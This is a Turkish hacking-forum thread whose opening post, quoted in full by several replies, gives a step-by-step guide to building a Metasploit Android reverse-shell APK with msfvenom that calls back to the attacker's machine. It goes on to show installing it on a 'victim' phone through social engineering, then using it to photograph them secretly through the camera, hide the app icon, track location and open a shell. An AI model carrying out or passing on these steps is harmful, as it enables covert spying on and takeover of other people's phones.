M-e-t-asploit ile Android Cihazları Hackleyin. // Gramenyo (1 Viewer)

Joined
Feb 9, 2019
Credits
175
Rating - 0%
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
View hidden content is available for registered users!

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig
View hidden content is available for registered users!

https://www.turkhackteam.org/images/statusicon/wol_error.gif Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk



https://www.turkhackteam.org/images/statusicon/wol_error.gif Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole
https://i.hizliresim.com/jql8j9.png


Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit



Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help

https://www.turkhackteam.org/images/statusicon/wol_error.gif Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.

https://www.turkhackteam.org/images/statusicon/wol_error.gif Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.



https://www.turkhackteam.org/images/statusicon/wol_error.gif Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.



https://www.turkhackteam.org/images/statusicon/wol_error.gif Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.

https://www.turkhackteam.org/images/statusicon/wol_error.gif Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
[HIDE/]​
 

WyX

Joined
Dec 18, 2019
Credits
0
Rating - 0%
El
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
View hidden content is available for registered users!

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig
View hidden content is available for registered users!



Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk





Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole



Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit



Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help



Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.



‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.





‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.





‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.



NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
[HIDE/]​
Eline sağlik
 
Joined
Jan 26, 2020
Credits
36
Rating - 0%
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
View hidden content is available for registered users!

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig
View hidden content is available for registered users!



Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk





Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole



Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit



Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help



Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.



‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.





‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.





‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.



NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
[HIDE/]​
 
Joined
May 29, 2019
Credits
3
Rating - 0%
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
View hidden content is available for registered users!

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig
View hidden content is available for registered users!



Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk





Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole



Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit



Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help



Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.



‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.





‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.





‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.



NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
[HIDE/]​
 
Joined
Jan 9, 2020
Credits
0
Rating - 0%
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
View hidden content is available for registered users!

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig
View hidden content is available for registered users!



Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk





Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole



Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit



Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help



Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.



‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.





‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.





‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.



NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
[HIDE/]​
bakalım
 
Joined
Feb 5, 2020
Credits
0
Rating - 0%
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
View hidden content is available for registered users!

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig
View hidden content is available for registered users!



Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk





Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole



Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit



Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help



Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.



‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.





‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.





‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.



NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
[HIDE/]​
teşekküler
 
Joined
Feb 11, 2020
Credits
3
Rating - 0%
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
View hidden content is available for registered users!

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig
View hidden content is available for registered users!



Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk





Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole



Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit



Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help



Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.



‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.





‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.





‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.



NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
[HIDE/]​
 
Joined
Mar 8, 2019
Credits
0
Rating - 0%
İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.
View hidden content is available for registered users!

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig
View hidden content is available for registered users!



Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk





Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole



Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit



Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help



Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.



‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.





‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.





‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.



NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)
[HIDE/]​
 

Users who are viewing this thread

Top